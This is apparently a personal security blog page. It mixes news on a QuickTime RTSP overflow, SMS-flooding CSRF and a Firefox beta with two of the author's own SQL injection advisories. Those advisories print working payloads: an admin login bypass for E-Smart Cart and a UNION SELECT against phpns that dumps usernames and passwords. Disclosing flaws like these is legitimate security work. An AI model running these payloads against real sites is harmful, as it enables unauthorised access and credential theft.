Critical vulnerability in Quicktime 7.3

USCert has issued a warning concerning a buffer overflow in the current version of Apple QuickTime. Attackers can manipulate content type headers in an RTSP data stream to cause a buffer overflow that allows malicious code to be injected into the system under attack. Users of Apple's iTunes multimedia software are also affected by the hole because the current version of QuickTime is installed on systems when iTunes is installed.

Demo programs that reportedly demonstrate the vulnerability have already popped up in the milw0rm archive. Until Apple releases a patch for this vulnerability, the only workaround for the playback of RTSP streams is to use other software or to restrict the use of streaming data via the firewall. Users are also advised to be careful with QuickTime Link files (.qtl), which can also reference RTSP sources. Apple released version 7.3 only a few weeks ago.

This vulnerability is also coliding with Windows Vista and giving an attacker permissions to control a remote machine.

Proof of concept: Here
Advisory from CERT: Here

CSRF on mobile phones

Today I read an good article about using CSRF (Cross-site Request Forgery) on mobile phones. It uses the lack verification of sms limits on some phone services like ring tones, favorites, etc. It was posted on Bugtraq, but you can read more about this on the original website.

No. I'm not going to show you how to use Cross-Site Request Forgery (CSRF) in order to attack mobile phones while using a mobile phone to surf the web. Instead, I'm going to talk about how CSRF vulnerabilities can be used to cause denial-of-service attacks against mobile phones, by flooding the phone with SMS and service messages.

Mobile phone service providers in Israel, and throughout the world, provide a web interface to send SMS messages. Fortunately, they limit the SMS sending web interface to 20 messages per day, and they also require the user to login to their web site in order to send an SMS.

Unfortunately, at-least when referring to the Israeli providers, they also give attackers a way to send endless SMS and service messages without any kind of authentication and with a simple HTTP request. While this method doesn't allow to specify the message of the SMS, it does allow the attacker to specify the targeted phone number.

Full article

Mozilla fights for security in beta 3

The Mozilla Foundation released on Monday a beta version of the group's latest open-source Firefox browser, rewriting parts of the code and enhancing security.

Firefox 3 Beta 1 adds anti-malware features to the browser, using a similar mechanism as the anti-phishing feature in Firefox 2, harnessing a Google-generated blacklist of sites that are hosting malicious code. The beta version of the browser also checks plugins to make sure they are compatible with the software and uses a secure download mechanism for updates.

In SecurityFocus

I actually use Opera browser, but I used mozilla for years, so if you want take a look at the mozilla beta 3 (here)

Some browser statistics links:
http://www.w3schools.com/browsers/default.asp
http://operawatch.com/news/2006/08/some-opera-statistics-2.html
http://en.wikipedia.org/wiki/Usage_share_of_web_browsers

DIM application

I finished my school project about controling pharmaceutical sales representative in portuguese health centers or hospitals. It's coded in Visual Basic .NET and uses SQL server database support. Simple fast and secure, login credentials are controlled by stored procedures. You can see some screenshots here:

Screen 1
Screen 2
Screen 3
Screen 4

E-Smart Cart SQL Injection

Software: E-Smart Card
Vendor link: http://www.hostnomi.com/cart.htm
Attack: SQL Injection (admin bypass)

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable file is embadmin/login.asp, and a malicious user can bypass administration login.

Proof of Concept:
embadmin/login.asp

user: 'or''='
pass: 'or''='


Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted and waiting for reply.

PHPNS SQL Injection

Software: phpns current version (v1.1)
Vendor link: http://phpns.com
Attack: SQL Injection

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variable is $nid and maybe others.

Proof of Concept:
/phpns/shownews.php?id=1'[SQL Injection]

Shows username : pass from userinfo
/phpns/shownews.php?id=1' union select all null,null,concat(char(117,115,101,114,110,97,109,101,58),
username,char(32,112,97,115,115,119,111,114,100,58),password),
null,null,null from userinfo/*

Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted and replyed that they are fixing it.

Old school ascii artwork

I know is kind of old, but this thing rules at all time. I first saw the star wars telnet ascii thing like 8/10 years ago and it still rox.

# For star wars
telnet towel.blinkenlights.nl

# For DOS chat room and some extras
telnet centralperk.us 2323